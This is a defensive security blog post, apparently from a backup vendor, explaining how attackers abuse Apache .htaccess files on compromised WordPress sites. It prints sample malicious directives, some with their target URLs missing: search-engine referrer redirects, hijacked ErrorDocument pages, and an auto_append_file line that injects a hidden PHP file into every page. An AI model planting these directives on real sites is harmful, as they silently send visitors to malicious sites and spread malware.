Website security and .htaccess files

The .htaccess file is a hidden text file used by the Apache web server to configure your website without the need to create or modify global server configuration files. It is usually located in the root folder of the website but can be in other locations as well, depending on what files and folders do you want to be affected by the specified configuration.

This file contains a series of “directives,” similar to those in traditional Apache web server configuration files. Usually, these directives are key-value pair commands indicating if a configuration should be on or off, but they can be more complex. The .htaccess file allows anyone in control of a particular set of website content to execute many directives which can change the behavior of that site, without access to Apache’s global httpd.conf.

A typical .htaccess file.

Why is it important?

This file is very important to your website as it can affect the availability and the security of your site or application. In this post, we are going to focus on the security functions of .htaccess although it is important to understand that using a .htaccess file on your server might cause your site to load more slowly, negatively impacting your visitors, and adds complexity to your website or application setup.

According to the Apache web server documentation, if you have direct and easy access to your web server configuration files, then there’s no need to create and use a .htaccess file. This distributed configuration can create another point of failure or attack vector should your site or server get compromised.

Generally, developers use the .htaccess file to do one of the following:

  • Server Side Includes (SSI) which allows updating a large number of pages at once
  • Custom Mime Types, if you need to set up your server to allow certain types of files
  • Mod_Rewrite which allows you to change the way a URL is displayed to your visitor
  • Authentication to require a password to access a certain page on your site
  • Custom Error Pages which you can use to redirect your users to depending on what error occurred

How can it compromise my site?

Attackers can also use this file to make configuration changes on your site. If your site uses .htaccess and the file wasn’t properly protected or configured, you are giving another point of entrance for someone to access and compromise your server. Attackers can use this file to hide some kind of malware like a backdoor, inject content, modify PHP configuration or even to redirect search engines robots (crawlers) to their own sites to get more visitors.

There are many ways an attacker can redirect a victim to a malicious website. But these are the most common ones we see, especially with WordPress websites:

1. Redirect from search engines

One of the most simple and common types of attack is where an attacker adds this piece of code into the .htaccess of the compromised site:

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.* [OR]
RewriteCond %{HTTP_REFERER} .*bing.* [OR]
RewriteCond %{HTTP_REFERER} .*baidu.* [OR]
RewriteRule ^(.*)$ [R=301,L]

If you see this in your .htaccess file and you don’t know where it came from, remove it immediately! What this does is to redirect users coming from search engine results to a malicious website where they will be compromised. This kind of attack doesn’t affect users that type the site directly on the browser address bar, which is what usually the owner or admin of the site does so it can be hard to quickly identify and block the attack.

2. Redirect from error pages

Another common kind of attack is redirecting the error pages to malicious sites. This is much harder to detect since you would have to cause an error or access a specific page on the site to trigger the redirection. Here’s an example of the directive that redirects from error pages:

RewriteEngine On
ErrorDocument 400
ErrorDocument 401
ErrorDocument 403
ErrorDocument 404

3. Inserting malware 

Another not so common type of attack with the .htaccess file is where the attacker uses this file to modify PHP core configurations like the php.ini directives. In this particular case, an attacker could modify the ‘auto_append_file’ value which would allow them to load malware from a hidden file thus causing it to be injected into every PHP file that server has. Usually, this code that is appended is a call or request to a malicious file somewhere where the attacker has control of. It can be JavaScript malware or PHP malware. For example:

           php_value auto_append_file “/opt/malicious_code.php”

          <script src=""></script>

How to protect your site?

A CodeGuard ChangeAlert Email Notification

Even if you are not familiar with Apache configuration files, there are many things you can do to protect your site from being hacked. One of the things is to monitor file changes on your site and verify that there are not any unauthorized redirects that might indicate that it was compromised. You should always keep backups of your files, including .htaccess so that you are able to compare to those on your server at the moment. In addition to providing these backups automatically, CodeGuard ChangeAlert email notifications explicitly call attention to .htaccess file changes so that you can monitor these files for modifications.

You can also scan your site for web application vulnerabilities such as SQL Injection or Cross Site Scripting. Check the OWASP Top 10 for more information about these kinds of vulnerabilities and tools you can use to test your website.

Leave a comment

Your email address will not be published. Required fields are marked *